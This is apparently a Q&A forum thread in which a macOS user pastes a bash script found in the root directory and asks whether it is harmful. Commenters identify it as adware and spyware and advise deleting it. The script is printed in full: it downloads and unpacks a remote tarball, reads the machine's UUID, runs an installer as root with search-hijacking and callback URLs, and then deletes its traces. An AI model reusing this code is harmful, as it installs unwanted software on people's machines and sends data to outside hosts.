# Found a File on my Root not sure what it is?

Tags: macos, security, root

I was using a terminal and found this code file named "file" (bash) in my root directory. Is this file bad, I don't know what it's doing and it's freaking me out.

```
func_4(){
/bin/mkdir -p /var/tmp
/usr/bin/curl -s -L -o /var/tmp/sr.tgz 
"http://c.onlinemacupdate.com/static/sr/sr_v2.tgz"
/usr/bin/tar -xzf /var/tmp/sr.tgz -C /var/tmp
cd /var/tmp/dvs
mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, 
line, "\""); printf("%s\n", line[4]); }')

COUNTRY="US"
if [ "$COUNTRY" == "AU" ] || [ "$COUNTRY" == "CA" ] || [ "$COUNTRY" == "US" ] 
|| [ "$COUNTRY" == "NZ" ]\
|| [ "$COUNTRY" == "ES" ] || [ "$COUNTRY" == "IT" ] || [ "$COUNTRY" == "NL" ] 
|| [ "$COUNTRY" == "FR" ] || [ "$COUNTRY" == "IN" ]\
|| [ "$COUNTRY" == "DE" ]; then
sudo ./setup.sh "http://www.searchitdown.com/? 
n=006&searchsource=55&UM=8&gd=SY1000653" "http://www.searchitdown.com/? 
n=006&searchsource=69&UM=8&gd=SY1000653" 
"http://www.searchitdown.com/Results.aspx? 
n=006&searchsource=58&UM=8&gd=SY1000653" "searchitdown" "upd" 
"http://i.firstinstallmac.club/c/cc?id="
else
sudo ./setup.sh "http://feed.snowbitt.com/ 

publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=hp
&type=YHS_TGE_5a01fc&_=tt1" "http://feed.snowbitt.com/? 

publisher=TingSyn&ts=sy&barcodeid=51222999&
searchtype=nt&type=YHS_TGE_5a01fc&_=tt1" "http://feed.snowbitt.com/? 
publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=ds&
type=TGE_5a01fc" "snowbitt" "upd" "http://i.firstinstallmac.club/c/cc?id="
fi

CLIENT_COMP=""
if [[ ! -z "$CLIENT_COMP" ]]; then
/usr/bin/curl -s -L -o /var/tmp/re.txt "http://i.firstinstallmac.club/is/if?i="
fi

func_taaVqst(){
sleep 220
rm -rf /var/tmp/dvs
rm -rf /var/tmp/sr.tgz
}
f unc_taaVqst &

} 
func_4 &
```

what is this code doing? is this bad?

Comment: In very short, it downloads stuff from websites and runs it as root. It installs backdoors and establishes a control channel to your server I guess. You should try to find out how it got there (what was exploited) and then reinstall the server without the vulnerability.

Comment: https://apple.stackexchange.com/questions/368733/what-is-this-random-file-in-macintosh-hd-malicious

Answer (score 0):

Delete it. It's adware and spyware as mentioned [here](https://apple.stackexchange.com/questions/368733/what-is-this-random-file-in-macintosh-hd-malicious).